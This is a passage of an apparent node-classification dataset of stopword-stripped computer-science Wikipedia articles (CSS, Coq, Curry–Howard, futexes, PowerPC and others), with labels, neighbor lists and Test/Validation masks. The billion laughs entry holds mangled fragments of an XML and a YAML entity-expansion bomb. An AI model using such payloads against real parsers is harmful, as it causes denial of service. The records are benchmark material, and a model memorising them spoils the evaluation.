2005 returned candidate recommendation status july 19 2007 addition problems codice_34 extension used software product used convert powerpoint files compact slide show files web servers served codice_34 mime type codice_36 rather codice_1 css various levels profiles level css builds upon last typically adding new features typically denoted css 1 css 2 css 3 css 4 profiles typically subset one levels css built particular device user interface currently profiles mobile devices printers television sets profiles confused media types added css 2 first css specification become official w3c recommendation css level 1 published december 17 1996 håkon wium lie bert bos credited original developers among capabilities support w3c longer maintains css 1 recommendation css level 2 specification developed w3c published recommendation may 1998 superset css 1 css 2 includes number new capabilities like absolute relative fixed positioning elements z-index concept media types support aural style sheets later replaced css 3 speech modules bidirectional text new font properties shadows w3c longer maintains css 2 recommendation css level 2 revision 1 often referred css 2.1 fixes errors css 2 removes poorly supported fully interoperable features adds already implemented browser extensions specification comply w3c process standardizing technical specifications css 2.1 went back forth working draft status candidate recommendation status many years css 2.1 first became candidate recommendation february 25 2004 reverted working draft june 13 2005 review returned candidate recommendation 19 july 2007 updated twice 2009 however changes clarifications made went back last call working draft 7 december 2010 css 2.1 went proposed recommendation 12 april 2011 reviewed w3c advisory committee finally published w3c recommendation 7 june 2011 css 2.1 planned first final revision level 2—but low priority work css 2.2 began 2015 unlike css 2 large single specification defining various features css 3 divided several separate documents called modules module adds new capabilities extends features defined css 2 preserving backward compatibility work css level 3 started around time publication original css 2 recommendation earliest css 3 drafts published june 1999 due modularization different modules different stability statuses modules candidate recommendation cr status considered moderately stable cr stage implementations advised drop vendor prefixes single integrated css4 specification split separate level 4 modules css3 split css language definition modules modules allowed level independently modules level 3—they build things css 2.1 level-4 modules exist image values backgrounds borders selectors build functionality preceding level-3 module modules defining entirely new functionality flexbox designated level 1 css working group sometimes publishes snapshots collection whole modules parts drafts considered stable interoperably implemented hence ready use far five best current practices documents published notes 2007 2010 2015 2017 2018 web browser uses layout engine render web pages support css functionality consistent browsers parse css perfectly multiple coding techniques developed target specific browsers workarounds commonly known css hacks css filters adoption new functionality css hindered lack support major browsers example internet explorer slow add support many css 3 features slowed adoption features damaged browser reputation among developers order ensure consistent experience users web developers often test sites across multiple operating systems browsers browser versions increasing development time complexity tools browserstack built reduce complexity maintaining environments addition testing tools many sites maintain lists browser support specific css properties including caniuse mozilla developer network additionally css 3 defines feature queries provide codice_38 directive allow developers target browsers support certain functionality directly within css css supported older browsers also sometimes patched using javascript polyfills pieces javascript code designed make browsers behave consistently workarounds—and need support fallback functionality—can add complexity development projects consequently companies frequently define list browser versions support websites adopt newer code standards incompatible older browsers browsers cut accessing many resources web sometimes intentionally many popular sites internet visually degraded older browsers due poor css support work large part due evolution javascript web technologies noted limitations current capabilities css include additionally several issues present prior versions css standard alleviated css frameworks pre-prepared libraries meant allow easier standards-compliant styling web pages using cascading style sheets language css frameworks include foundation blueprint bootstrap cascade framework materialize like programming scripting language libraries css frameworks usually incorporated external .css sheets referenced html provide number ready-made options designing laying web page although many frameworks published authors use mostly rapid prototyping learning prefer 'handcraft css appropriate published site without design maintenance download overhead many unused features site styling size css resources used project increases development team often needs decide common design methodology keep organized goals ease development ease collaboration development performance deployed stylesheets browser popular methodologies include oocss object oriented css acss atomic css ocss organic cascade style sheet smacss scalable modular architecture css bem block element modifier",
    "neighbors": [
      513,
      6657,
      9732,
      9736,
      6154,
      16,
      2579,
      24,
      4121,
      9241,
      6171,
      7708,
      9757,
      7713,
      10791,
      3626,
      9770,
      559,
      3120,
      2611,
      4661,
      3639,
      10808,
      9786,
      3643,
      9275,
      64,
      65,
      1098,
      4171,
      5707,
      10834,
      6231,
      8281,
      2139,
      6747,
      9311,
      8289,
      1642,
      9834,
      9841,
      115,
      9843,
      4213,
      119,
      4728,
      6775,
      124,
      637,
      8316,
      1664,
      2182,
      6791,
      11418,
      10910,
      8351,
      3744,
      4768,
      1698,
      7340,
      9394,
      1203,
      9908,
      7861,
      185,
      11449,
      4797,
      7871,
      9409,
      11466,
      9419,
      7885,
      11469,
      9424,
      10452,
      4310,
      2777,
      8923,
      737,
      228,
      4326,
      6886,
      5869,
      10991,
      5875,
      2804,
      10486,
      2296,
      8443,
      7422,
      9987,
      7943,
      6408,
      6920,
      1802,
      7951,
      5907,
      278,
      4893,
      7965,
      7455,
      10744,
      1834,
      4920,
      2370,
      10057,
      11082,
      2893,
      3407,
      3921,
      339,
      9560,
      9561,
      8557,
      7022,
      3442,
      10611,
      6528,
      11650,
      3971,
      8068,
      3462,
      8070,
      8584,
      5515,
      7567,
      6034,
      7572,
      5536,
      417,
      5026,
      1959,
      944,
      438,
      1470,
      5054,
      6086,
      4048,
      5078,
      11223,
      4056,
      7644,
      479,
      4064,
      482,
      10722,
      5605,
      6629,
      487,
      8169,
      9195,
      5612,
      5101,
      494,
      1520,
      7152,
      8179,
      6133,
      502,
      5622,
      6134,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 8924,
    "label": 9,
    "text": "Coq:coq computer science coq interactive theorem prover allows expression mathematical assertions mechanically checks proofs assertions helps find formal proofs extracts certified program constructive proof formal specification coq works within theory calculus inductive constructions derivative calculus constructions coq automated theorem prover includes automatic theorem proving tactics various decision procedures association computing machinery rewarded thierry coquand gérard pierre huet christine paulin-mohring bruno barras jean-christophe filliâtre hugo herbelin chetan murthy yves bertot pierre castéran 2013 acm software system award coq seen programming language coq implements dependently typed functional programming language seen logical system implements higher-order type theory development coq supported since 1984 inria collaboration école polytechnique university paris-sud paris diderot university cnrs 1990s ens lyon also part project development coq initiated gérard pierre huet thierry coquand 40 people mainly researchers contributed features core system implementation team successively coordinated gérard huet christine paulin-mohring hugo herbelin matthieu sozeau coq part implemented ocaml bit c. core system extended due mechanism plug-ins word coq means rooster french stems local tradition naming french research development tools animal names 1991 coquand implementing language called calculus constructions simply called coc time 1991 new implementation based extended calculus inductive constructions started name changed coc coq also indirect reference thierry coquand developed calculus constructions along gérard pierre huet calculus inductive constructions along christine paulin-mohring coq provides specification language called gallina meaning hen latin spanish italian catalan programs written gallina weak normalization property – always terminate one way avoid halting problem may surprising since infinite loops non-termination common programming languages georges gonthier microsoft research cambridge england benjamin werner inria used coq create surveyable proof four color theorem completed 2005 based work significant extension coq developed called ssreflect stands small scale reflection despite name new features added coq ssreflect general-purpose features useful merely computational reflection style proof include ssreflect 1.4 freely available dual-licensed open source cecill-b cecill-2.0 license compatible coq 8.4",
    "neighbors": [
      4612,
      9866,
      1936,
      11026,
      11028,
      10008,
      2585,
      5796,
      6188,
      7983,
      2045,
      4791,
      6460,
      8511,
      11221,
      3926,
      5079,
      9816,
      7386,
      4446,
      6239,
      8926,
      5612,
      369,
      11641,
      1019,
      5885
    ],
    "mask": "None"
  },
  {
    "node_id": 8925,
    "label": 3,
    "text": "Robowarrior:robowarrior robowarrior known japan english language action/puzzle video game developed hudson soft co-developed aicom making first nes game worked published jaleco nintendo entertainment system msx robowarrior takes place alien planet called altile created scientists solution overpopulation problem earth peaceful period altitle robowarriors decommissioned earth xantho empire invades altitle try transform personal gain player operates cyborg named zed z-type earth defence game zed raids altile fight xantho empire destroy leader xur zed deploys bombs clear path rocks walls forests killing enemies collecting items gameplay elements resemble bomberman 1983 robowarrior comprises five level formats 27 levels game one player must obtain key time limit expires another key unavailable player acquires crystal chalice levels cast darkness rendering obstructions invisible unless player lit lamp still levels mazes player must find blast-through weak points walls proceed periodically player engages boss level multiple bombs required bomb certain unconventional areas robowarrior also features water stages enemies respawn stage allowing player stock bombs zed controlled via overhead viewpoint player move four directions like hudson soft games hudson bee game lot stage work robowarrior features 4 11 horizontal hudson bees 1991 sunsoft published sequel bomber king game boy titled bomber king scenario 2",
    "neighbors": [
      10010,
      6109,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 8926,
    "label": 9,
    "text": "Curry–Howard_correspondence:curry–howard correspondence programming language theory proof theory curry–howard correspondence also known curry–howard isomorphism equivalence proofs-as-programs propositions- formulae-as-types interpretation direct relationship computer programs mathematical proofs generalization syntactic analogy systems formal logic computational calculi first discovered american mathematician haskell curry logician william alvin howard link logic computation usually attributed curry howard although idea related operational interpretation intuitionistic logic given various formulations l. e. j. brouwer arend heyting andrey kolmogorov see brouwer–heyting–kolmogorov interpretation stephen kleene see realizability relationship extended include category theory three-way curry–howard–lambek correspondence beginnings curry–howard correspondence lie several observations words curry–howard correspondence observation two families seemingly unrelated formalisms—namely proof systems one hand models computation other—are fact kind mathematical objects one abstracts peculiarities either formalism following generalization arises proof program formula proves type program informally seen analogy states return type function i.e. type values returned function analogous logical theorem subject hypotheses corresponding types argument values passed function program compute function analogous proof theorem sets form logic programming rigorous foundation proofs represented programs especially lambda terms proofs run correspondence starting point large spectrum new research discovery leading particular new class formal systems designed act proof system typed functional programming language includes martin-löf intuitionistic type theory coquand calculus constructions two calculi proofs regular objects discourse one state properties proofs way program field research usually referred modern type theory typed lambda calculi derived curry–howard paradigm led software like coq proofs seen programs formalized checked run converse direction use program extract proof given correctness—an area research closely related proof-carrying code feasible programming language program written richly typed development type systems partly motivated wish make curry–howard correspondence practically relevant curry–howard correspondence also raised new questions regarding computational content proof concepts covered original works curry howard particular classical logic shown correspond ability manipulate continuation programs symmetry sequent calculus express duality two evaluation strategies known call-by-name call-by-value speculatively curry–howard correspondence might expected lead substantial unification mathematical logic foundational computer science hilbert-style logic natural deduction two kinds proof systems among large family formalisms alternative syntaxes include sequent calculus proof nets calculus structures etc one admits curry–howard correspondence general principle proof system hides model computation theory underlying untyped computational structure kinds proof system possible natural question whether something mathematically interesting said underlying computational calculi conversely combinatory logic simply typed lambda calculus models computation either girard linear logic developed fine analysis use resources models lambda calculus typed version turing machine would behave proof system typed assembly languages instance low-level models computation carry types possibility writing non-terminating programs turing-complete models computation languages arbitrary recursive functions must interpreted care naive application correspondence leads inconsistent logic best way dealing arbitrary computation logical point view still actively debated research question one popular approach based using monads segregate provably terminating potentially non-terminating code approach also generalizes much richer models computation related modal logic natural extension curry–howard isomorphism radical approach advocated total functional programming eliminate unrestricted recursion forgo turing completeness although still retaining high computational complexity using controlled corecursion wherever non-terminating behavior actually desired general formulation curry–howard correspondence correspondence formal proof calculi type systems models computation particular splits two correspondences one level formulas types independent particular proof system model computation considered one level proofs programs time specific particular choice proof system model computation considered level formulas types correspondence says implication behaves function type conjunction product type may called tuple struct list term depending language disjunction sum type type may called union false formula empty type true formula singleton type whose sole member null object quantifiers correspond dependent function space products appropriate summarized following table level proof systems models computations correspondence mainly shows identity structure first particular formulations systems known hilbert-style deduction system combinatory logic secondly particular formulations systems known natural deduction lambda calculus natural deduction system lambda calculus following correspondences beginning simple remark curry feys 1958 book combinatory logic simplest types basic combinators k combinatory logic surprisingly corresponded respective axiom schemes α → β → α α → β → γ → α → β → α → γ used hilbert-style deduction systems reason schemes often called axioms k s. examples programs seen proofs hilbert-style logic given one restricts implicational intuitionistic fragment simple way formalize logic hilbert style follows let γ finite collection formulas considered hypotheses δ derivable γ denoted γ ⊢ δ following cases formalized using inference rules left column following table typed combinatory logic formulated using similar syntax let γ finite collection variables annotated types term also annotated type depend variables γ ⊢ δ generation rules defined given right-column curry remark simply states columns one-to-one correspondence restriction correspondence intuitionistic logic means classical tautologies peirce law α → β → α → α excluded correspondence seen abstract level correspondence restated shown following table especially deduction theorem specific hilbert-style logic matches process abstraction elimination combinatory logic thanks correspondence results combinatory logic transferred hilbert-style logic vice versa instance notion reduction terms combinatory logic transferred hilbert-style logic provides way canonically transform proofs proofs statement one also transfer notion normal terms notion normal proofs expressing hypotheses axioms never need detached since otherwise simplification happen conversely non provability intuitionistic logic peirce law transferred back combinatory logic typed term combinatory logic typable type results completeness sets combinators axioms also transferred instance fact combinator x constitutes one-point basis extensional combinatory logic implies single axiom scheme principal type x adequate replacement combination axiom schemes curry emphasized syntactic correspondence hilbert-style deduction combinatory logic howard made explicit 1969 syntactic analogy programs simply typed lambda calculus proofs natural deduction left-hand side formalizes intuitionistic implicational natural deduction calculus sequents use sequents standard discussions curry–howard isomorphism allows deduction rules stated cleanly implicit weakening right-hand side shows typing rules lambda calculus left-hand side γ γ γ denote ordered sequences formulas right-hand side denote sequences named i.e. typed formulas names different paraphrase correspondence proving γ ⊢ α means program given values types listed γ manufactures object type α axiom corresponds introduction new variable new unconstrained type rule corresponds function abstraction rule corresponds function application observe correspondence exact context γ taken set formulas e.g. λ -terms λx λy x λx λy type would distinguished correspondence examples given howard showed correspondence extends connectives logic constructions simply typed lambda calculus seen abstract level correspondence summarized shown following table especially also shows notion normal forms lambda calculus matches prawitz notion normal deduction natural deduction follows algorithms type inhabitation problem turned algorithms deciding intuitionistic provability howard correspondence naturally extends extensions natural deduction simply typed lambda calculus non-exhaustive list time curry also time howard proofs-as-programs correspondence concerned intuitionistic logic i.e logic particular peirce law deducible extension correspondence peirce law hence classical logic became clear work griffin typing operators capture evaluation context given program execution evaluation context later reinstalled basic curry–howard-style correspondence classical logic given note correspondence double-negation translation used map classical proofs intuitionistic logic continuation-passing-style translation used map lambda terms involving control pure lambda terms particularly call-by-name continuation-passing-style translations relates kolmogorov double negation translation call-by-value continuation-passing-style translations relates kind double-negation translation due kuroda finer curry–howard correspondence exists classical logic one defines classical logic adding axiom peirce law allowing several conclusions sequents case classical natural deduction exists proofs-as-programs correspondence typed programs parigot λμ-calculus proofs-as-programs correspondence settled formalism known gentzen sequent calculus correspondence well-defined pre-existing model computation hilbert-style natural deductions sequent calculus characterized presence left introduction rules right introduction rule cut rule eliminated structure sequent calculus relates calculus whose structure close one abstract machines informal correspondence follows n. g. de bruijn used lambda notation representing proofs theorem checker automath represented propositions categories proofs late 1960s period time howard wrote manuscript de bruijn likely unaware howard work stated correspondence independently sørensen urzyczyn 1998 2006 pp 98–99 researchers tend use term curry–howard–de bruijn correspondence place curry–howard correspondence bhk interpretation interprets intuitionistic proofs functions specify class functions relevant interpretation one takes lambda calculus class function bhk interpretation tells howard correspondence natural deduction lambda calculus kleene recursive realizability splits proofs intuitionistic arithmetic pair recursive function proof formula expressing recursive function realizes i.e correctly instantiates disjunctions existential quantifiers initial formula formula gets true kreisel modified realizability applies intuitionistic higher-order predicate logic shows simply typed lambda term inductively extracted proof realizes initial formula case propositional logic coincides howard statement extracted lambda term proof seen untyped lambda term realizability statement paraphrase fact extracted lambda term type formula means seen type gödel dialectica interpretation realizes extension intuitionistic arithmetic computable functions connection lambda calculus unclear even case natural deduction joachim lambek showed early 1970s proofs intuitionistic propositional logic combinators typed combinatory logic share common equational theory one cartesian closed categories expression curry–howard–lambek correspondence used people refer three way isomorphism intuitionistic logic typed lambda calculus cartesian closed categories objects interpreted types propositions morphisms terms proofs correspondence works equational level expression syntactic identity structures case curry howard correspondences i.e structure well-defined morphism cartesian-closed category comparable structure proof corresponding judgment either hilbert-style logic natural deduction clarify distinction underlying syntactic structure cartesian closed categories rephrased objects types defined morphisms terms defined well-defined morphisms typed terms defined following typing rules usual categorical morphism notation formula_13 replaced sequent calculus notation formula_14 identity composition unit type terminal object cartesian product left right projection currying application finally equations category equations imply following formula_34-laws exists formula_37 iff formula_38 provable implicational intuitionistic logic thanks curry–howard correspondence typed expression whose type corresponds logical formula analogous proof formula examples example consider proof theorem lambda calculus type identity function λ x x combinatory logic identity function obtained applying λ fgx fx gx twice k λ xy x k k description proof says following steps used prove general procedure whenever program contains application form p q steps followed complicated example let look theorem corresponds b function type b β → α → γ → β → γ → α b equivalent k k roadmap proof theorem β → α → γ → β → γ → α first step construct k make antecedent k axiom look like axiom set α equal equal avoid variable collisions since antecedent consequent detached using modus ponens theorem corresponds type k apply expression taking follows put yielding detach consequent formula type k special case theorem last formula must applied k. specialize k time replacing antecedent prior formula detaching consequent switching names variables gives us remained prove diagram gives proof natural deduction shows interpreted λ -expression λ λ b λ g b g type recently isomorphism proposed way define search space partition genetic programming method indexes sets genotypes program trees evolved gp system curry–howard isomorphic proof referred species correspondences listed go much farther deeper example cartesian closed categories generalized closed monoidal categories internal language categories linear type system corresponding linear logic generalizes simply-typed lambda calculus internal language cartesian closed categories moreover shown correspond cobordisms play vital role string theory extended set equivalences also explored homotopy type theory became active area research around 2013 still type theory extended univalence axiom equivalence equivalent equality permits homotopy type theory used foundation mathematics including set theory classical logic providing new ways discuss axiom choice many things curry–howard correspondence proofs elements inhabited types generalized notion homotopic equivalence proofs paths space identity type equality type type theory interpreted path",
    "neighbors": [
      10043,
      10145,
      5796,
      8262,
      4455,
      4392,
      9065,
      10953,
      12,
      6188,
      10395,
      5585,
      1019,
      8924,
      6239
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8927,
    "label": 4,
    "text": "MAGEN_(security):magen security magen masking gateway enterprises information security technology designed ibm haifa research lab magen designed keep users viewing discrete chunks secret sensitive data screens authorized see magen applies sort inverse highlighting data question real time rendered screen allows eyes business logic implemented screen rather within affected application magen leverages combination optical character recognition screen scraping techniques",
    "neighbors": [
      5857,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 8928,
    "label": 2,
    "text": "Futex:futex computing futex short fast userspace mutex kernel system call programmers use implement basic locking building block higher-level locking abstractions semaphores posix mutexes condition variables futex consists kernelspace wait queue attached atomic integer userspace multiple processes threads operate integer entirely userspace using atomic operations avoid interfering one another resort relatively expensive system calls request operations wait queue example wake waiting processes put current process wait queue properly programmed futex-based lock use system calls except lock contended since operations require arbitration processes happen cases futex implemented 1995 beos also known benaphores https //www.haiku-os.org/legacy-docs/benewsletter/issue1-26.html linux hubertus franke ibm thomas j. watson research center matthew kirkwood ingo molnár red hat rusty russell ibm linux technology center originated futex mechanism futexes appeared first time version 2.5.7 linux kernel development series semantics stabilized version 2.5.40 futexes part linux kernel mainline since december 2003 release 2.6.x stable kernel series 2002 discussions took place proposal make futexes accessible via file system creating special node codice_1 codice_2 however linus torvalds strongly opposed idea rejected related patches may 2014 cve system announced vulnerability discovered linux kernel futex subsystem allowed denial-of-service attacks local privilege escalation may 2015 linux kernel introduced deadlock bug via commit b0c29f79ecea caused hang user applications bug affected many enterprise linux distributions including 3.x 4.x kernels red hat enterprise linux version 5 6 7 suse linux 12 amazon linux futexes implemented openbsd since 2016 futex mechanism one core concepts zircon kernel google fuchsia operating system since least april 2018 futexes two basic operations codice_3 codice_4 third operation called codice_5 available functions generic codice_4 operation move threads waiting queues",
    "neighbors": [
      7175,
      4616,
      9225,
      3082,
      5139,
      10780,
      10785,
      6180,
      1584,
      8242,
      9266,
      4665,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2709,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      1761,
      2278,
      233,
      7403,
      9455,
      10482,
      5363,
      2294,
      8439,
      2809,
      3323,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      4423,
      6988,
      333,
      10063,
      337,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      3990,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2011,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 8929,
    "label": 7,
    "text": "Messaging_pattern:messaging pattern software architecture messaging pattern network-oriented architectural pattern describes two different parts message passing system connect communicate telecommunications message exchange pattern mep describes pattern messages required communications protocol establish use communication channel two major message exchange patterns — request–response pattern one-way pattern example http request–response pattern protocol udp one-way pattern term message exchange pattern specific meaning within simple object access protocol soap soap mep types include ømq message queueing library provides so-called sockets kind generalization traditional ip unix sockets require indicating messaging pattern used optimized pattern basic ømq patterns pattern defines particular network topology request-reply defines so-called service bus publish-subscribe defines data distribution tree push-pull defines parallelised pipeline patterns deliberately designed way infinitely scalable thus usable internet scale",
    "neighbors": [
      1280,
      9441,
      10913,
      5029,
      7175,
      5449,
      9225,
      333,
      2222,
      8252,
      337,
      11413,
      3990,
      10486,
      2011,
      1756,
      4797
    ],
    "mask": "Test"
  },
  {
    "node_id": 8930,
    "label": 4,
    "text": "Billion_laughs_attack:billion laughs attack computer security billion laughs attack type denial-of-service dos attack aimed parsers xml documents also referred xml bomb exponential entity expansion attack example attack consists defining 10 entities defined consisting 10 previous entity document consisting single instance largest entity expands one billion copies first entity frequently cited example first entity string lol hence name billion laughs amount computer memory used would likely exceed available process parsing xml certainly would time vulnerability first reported original form attack aimed specifically xml parsers term may applicable similar subjects well problem first reported early 2002 began widely addressed 2008 defenses kind attack include capping memory allocated individual parser loss document acceptable treating entities symbolically expanding lazily extent content used xml version= 1.0 doctype lolz lolz lol9 /lolz xml parser loads document sees includes one root element lolz contains text lol9 however lol9 defined entity expands string containing ten lol8 strings lol8 string defined entity expands ten lol7 strings entity expansions processed small 1 kb block xml actually contain 10 billion lol taking almost 3 gigabytes memory billion laughs attack described takes exponential amount space quadratic blowup variation causes quadratic growth storage requirements simply repeating large entity avoid countermeasures detect heavily nested entities see computational complexity theory comparisons different growth classes billion laughs attack exist file format contain references example yaml bomb lol lol lol lol lol lol lol lol lol b b *a *a *a *a *a *a *a *a *a c c *b *b *b *b *b *b *b *b *b *c *c *c *c *c *c *c *c *c e e *d *d *d *d *d *d *d *d *d f f *e *e *e *e *e *e *e *e *e g g *f *f *f *f *f *f *f *f *f h h *g *g *g *g *g *g *g *g *g *h *h *h *h *h *h *h *h *h reason file formats allow references often preferred data arriving untrusted sources",
    "neighbors": [
      1474,
      2758,
      2409,
      6667,
      7091,
      11351,
      855,
      2558,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 8931,
    "label": 3,
    "text": "List_of_PowerPC_processors:list powerpc processors following list powerpc processors 32-bit 64-bit powerpc processors favorite embedded computer designers keep costs low high-volume competitive products cpu core usually bundled system-on-chip soc integrated circuit socs contain processor core cache processor local data on-chip along clocking timers memory sdram peripheral network serial i/o bus pci pci-x rom/flash bus i2c controllers ibm also offers open bus architecture called coreconnect facilitate connection processor core memory peripherals soc design ibm motorola competed along parallel development lines overlapping markets later development book e powerpc specification implemented ibm freescale semiconductor defines embedded extensions powerpc programming model northbridge host bridge powerpc cpu integrated circuit ic interfacing powerpc cpu memory southbridge ic northbridge also provide interface accelerated graphics ports agp bus peripheral component interconnect pci pci-x pci express hypertransport bus specific northbridge ic must used powerpc cpu impossible use northbridge intel amd x86 cpu powerpc cpu however possible use certain types x86 southbridge powerpc based motherboards example via 686b amd geode cs5536 list northbridge powerpc",
    "neighbors": [
      6914,
      3844,
      10501,
      3846,
      4743,
      5642,
      1548,
      3472,
      4880,
      7065,
      8090,
      1563,
      1309,
      799,
      6949,
      6311,
      3883,
      10543,
      4017,
      5297,
      7218,
      11314,
      8120,
      6715,
      1725,
      1983,
      1985,
      8530,
      3540,
      342,
      9302,
      6878,
      1635,
      8035,
      3185,
      4211,
      5235,
      8058,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8932,
    "label": 4,
    "text": "CA_Anti-Spyware:ca anti-spyware ca anti-spyware spyware detection program distributed ca inc. 2007 known pestpatrol product offered total defense inc. named total defense anti-virus pestpatrol inc. carlisle pa based software company founded dr. david stang robert bales developed pestpatrol released first version 2000 originally called safersite company changed name 2002 better reflect focus company pestpatrol anti-malware product designed protect computer system threats adware spyware viruses performed automated scans system hard disks windows registry crucial system areas enabled manual scans specific threats selected long list known malicious software among unique features cookiepatrol purges spyware cookies keypatrol detects keyloggers unlike anti-spyware programs designed home use single desktop pestpatrol also provided solution network environments found enterprises among features made appealing enterprise security administrators ability manage networked desktops remotely early versions product criticized poor user interface described alternatively something looks like application ported os/2 unclear buttons clunky text-based ui reviewers praised malware detection removal capabilities stating pestpatrol effective anti-spyware system short switch linux 've ever used described infoworld one established brands anti-spyware 2002 selected security product year network world cited ability detect remove 60,000 types malware defenses remote administration tools rats billing authority spyware protection licensed signature files use yahoo companion others 2003 along anti-spyware anti-malware companies webroot lavasoft aluria formed industry consortium fight malware called consortium antispyware technology coast computer associates ca technologies bought pestpatrol 2004 made part etrust computer security line includes virus scanner firewall using newly acquired technology ca created bundle named ca integrated threat management itm consisted anti-virus solution pestpatrol anti-spyware renamed ca anti-spyware 2007 program bought separately part ca internet security 2007 ca anti-spyware team instrumental exposing fact facebook collecting personal information users without knowledge even users opted facebook ill-fated beacon program even users logged facebook",
    "neighbors": [
      6797,
      877,
      6382,
      7983,
      9713,
      8978,
      7957,
      823,
      10392,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8933,
    "label": 5,
    "text": "Reliable_Event_Logging_Protocol:reliable event logging protocol reliable event logging protocol relp networking protocol computer data logging computer networks extends functionality syslog protocol provide reliable delivery event messages often used environments tolerate message loss financial industry relp uses tcp message transmission provides basic protection message loss guarantee delivery circumstances connection aborts tcp reliably detect whether last messages sent actually reached destination unlike syslog protocol relp works backchannel conveys information back sender messages processed receiver enables relp always know messages properly received even case connection abort relp developed 2008 reliable protocol rsyslog-to-rsyslog communication relp designer rainer gerhards explains lack reliable transmission industry-standard syslog core motivation create relp originally rfc 3195 syslog considered take part rsyslog suffered high overhead missing support new ietf syslog standards since published rfc 5424 named time relp initially meant solely rsyslog use became adopted widely currently tools linux windows support relp also in-house deployments java relp still formally standardized evolved industry standard computer logging relp inspired rfc 3195 syslog rfc 3080 initial connection sender receiver negotiate session options like supported command set application level window size network event messages transferred commands receiver acknowledges command soon processed sessions may closed sender receiver usually terminated sender side order facilitate message recovery session aborts relp keeps transaction numbers command negotiates messages need resent session reestablishment current version relp specify native tls support however practical deployments use wrappers around relp session order provide functionality publicly available implementations listed list exhaustive",
    "neighbors": [
      961,
      6273,
      10924
    ],
    "mask": "None"
  },
  {
    "node_id": 8934,
    "label": 7,
    "text": "Cloud_communications:cloud communications cloud communications internet-based voice data communications telecommunications applications switching storage hosted third-party outside organization using accessed public internet cloud services broad term referring primarily data-center-hosted services run accessed internet infrastructure recently services data-centric evolution voip voice internet protocol voice become part cloud phenomenon cloud telephony also known hosted telephony refers specifically voice services specifically replacement conventional business telephone equipment private branch exchange pbx third-party voip service cloud communications providers deliver voice data communications applications services hosting servers providers maintain giving customers access “ cloud. ” pay services applications use customers cost-effective reliable secure communications environment without headaches associated conventional pbx system deployment companies cut costs cloud communications services without sacrificing features success google others cloud-based providers demonstrated cloud-based platform effective software-based platform much lower cost voice services delivered cloud increases value hosted telephony users equally well turn cloud-based offering instead relying facilities-based service provider hosted voip expands options beyond local regional carriers past businesses able services telecommunication cloud communications attractive cloud become platform voice data video hosted services built around voice usually referred hosted voip cloud communications environment serves platform upon modes seamlessly work well integrate three trends enterprise communications pushing users access cloud allowing device choose development traditional communications infrastructure designed handle first trend increasingly distributed company operations branches home offices making wide area networks cumbersome inefficient costly second communications devices need access enterprise networks – iphones printers voip handsets example third data centers housing enterprise assets applications consolidating often located managed remotely cloud telephony services predominantly used business processes advertising e-commerce human resources payments processing services include distributed call centers economical teleworking scale services features functionality expected evolve even coming years embrace mobilisation facilitate direct collaboration streamline communications small medium-sized business capital investment set voip infrastructure in-house could high compared potential return cloud telephony could offer services lower-cost subscription basis cloud telephony provider also expert technology whereas small business unlikely employee level expertise justify expense full-time telecommunication infrastructure position traditional telephony applications required on-premises maintenance pbx great deal wiring main distribution frame mdf cloud communications promoted help businesses collaboration scalability supporting access via multiple locations devices cloud technology still must exist physical servers physical location servers important many nation laws cloud telephony companies provide hosted off-site software versions services previously constructed on-site hardware also allow users geographically distributed since voice traffic moves internet examples include",
    "neighbors": [
      0,
      4194,
      9732,
      2376,
      5202,
      8314,
      3327
    ],
    "mask": "Test"
  },
  {
    "node_id": 8935,
    "label": 4,
    "text": "Jim_Geovedi:jim geovedi jim geovedi born 28 june 1979 security expert indonesia focuses discovery computer network security vulnerabilities bbc news described guy n't look like bond villain ... possesses secrets might kill geovedi co-founded ran several security consulting companies 2001 co-founded c2pro consulting providing general consulting mostly government agencies 2004 co-founded bellua asia pacific renamed xynexis international later 2010 noosc global managed security services company part hackers group began 1996 called w00w00 met future co-founder bellua anthony zboralski currently based london interviewed issues including satellite security system banking security law enforcement geovedi also professional dj music producer currently signed elektrax recordings sydney-based techno label geovedi born bandarlampung lampung indonesia graduating high school 1998-1999 found living street without steady work later managed teach computer security programming despite lacking formal education field media often use example people become successful industry relying empirical knowledge acumen even without holding university degrees arsenal fan also fan death metal grindcore music interview beritagar 2013 geovedi revealed fan napalm death brutal truth cannibal corpse deicide",
    "neighbors": [
      939,
      2484,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8936,
    "label": 1,
    "text": "FloraNT:florant florant public access web-based database flora northern territory provides authoritative scientific information 4300 native taxa including descriptions maps images conservation status nomenclatural details together names used various aboriginal groups alien taxa 470 species also recorded users access fact sheets species details specimens held northern territory herbarium herbaria codes nt dna together keys regional factsheets distribution guides florant uses ibra version 5.1 botanical regions conservation act nt flora fauna territory parks wildlife conservation act 1976 twpca uses iucn criteria categories",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8937,
    "label": 3,
